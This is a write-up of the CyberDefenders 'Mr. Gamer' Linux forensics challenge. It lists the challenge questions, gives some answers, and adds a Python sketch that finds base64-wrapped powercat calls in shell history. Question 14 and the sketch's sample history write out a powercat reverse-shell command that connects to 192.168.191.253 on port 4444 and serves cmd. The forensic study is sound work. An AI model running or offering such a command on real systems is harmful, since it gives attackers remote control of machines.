Mr. Gamer Write Up (Cyberdefenders.org)
We are solving the Mr. Gamer room today. This room includes Linux forensics and a little bit of gaming. Let’s dive into the Mr. Gamer room. I used the Autopsy tool for this investigation.
#1 I use print statements for my logging ->
What is the name of the utility/library the user was looking at exploits for?
#2 Mischievous Lemur ->
What is the version ID number of the operating system on the machine?
#3 $whoami ->
What is the hostname of the computer?
#4 A little blue birdie told me ->
What is one anime that the user likes?
attack on titan
#5 Into the Matrix, we go ->
What is the UUID for the attacker’s Minecraft account?
#6 Today’s Youtube video is sponsored by… ->
What VPN client did the user install and use on the machine?
#7 Be our guest ->
What was the user’s first password for the guest wifi?
#8 If a picture is worth a thousand words, how many is a video worth? ->
The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
#9 I’m hungry for videos ->
What is the new channel name for the YouTuber whose cookbook is shown on the device?
Babish Culinary Universe
#10 Hunt the Wumpus ->
What is the module with the highest installed version for the chat application with the mascot Wumpus?
#11 It’s raining ocelots and wolves ->
According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
#12 Never gonna give… up on this question ->
What is the upload date of the second YouTube video on the channel from which the user downloaded a YouTube video?
If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.
#13 Buzzy Bees ->
What is the SHA-1 hash of Minecraft’s “latest” release according to the system?
You can find a version file at the path:
#14 The RCE is base(64)d on what? ->
What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was “powercat -D Y -l a -n,” the answer would be “-D Y -l a -n”)
Use bash history:
-c 192.168.191.253 -p 4444 -e cmd
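An added example, not part of the original write-up or the evidence image: one way to triage an exported shell history file for powercat calls when the command may be base64-wrapped, as the question title hints. The function names and the sample history are constructed, and the sketch assumes the wrapped command is UTF-8 or UTF-16LE text.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a short command line.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# powercat (optionally powercat.ps1) followed by its flags, up to a shell separator.
POWERCAT = re.compile(r"\bpowercat(?:\.ps1)?\s+(-[^|;&\n]*)", re.IGNORECASE)

def decode_candidates(token):
    """Yield readable decodings of one base64 token (UTF-8, then UTF-16LE)."""
    token += "=" * (-len(token) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return
    for enc in ("utf-8", "utf-16-le"):  # PowerShell -EncodedCommand uses UTF-16LE
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c.isprintable() or c.isspace() for c in text):
            yield text

def powercat_flags(history_text):
    """Return (line_number, flags) for each powercat call, plain or base64-wrapped."""
    hits = []
    for line_no, line in enumerate(history_text.splitlines(), 1):
        views = [line]  # inspect the raw line plus every decodable token in it
        for token in B64_TOKEN.findall(line):
            views.extend(decode_candidates(token))
        for view in views:
            match = POWERCAT.search(view)
            if match:
                hits.append((line_no, match.group(1).strip()))
    return hits

def _b64(cmd, enc):
    return base64.b64encode(cmd.encode(enc)).decode("ascii")
# Constructed sample history (not from the image); the flags are the answer above.
CMD = "powercat -c 192.168.191.253 -p 4444 -e cmd"
SAMPLE_HISTORY = "\n".join([
    "cd ~/Downloads", "cat /usr/share/doc/base-files/README",
    "echo " + _b64(CMD, "utf-8") + " | base64 -d",
    "pwsh -EncodedCommand " + _b64(CMD, "utf-16-le"),
])

if __name__ == "__main__":
    print(powercat_flags(SAMPLE_HISTORY))
```

Path fragments such as `/usr/share/doc/base` also match the base64 alphabet, which is why a decoded candidate is kept only when it is readable text and reported only when it contains a powercat call.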
#15 Hello (New) World ->
How many dimensions (including the overworld) did the player travel to in the “oldest of the worlds”?
#16 Matrix_1999 is the key! ->
What is the mojangClientToken stored in the Keystore?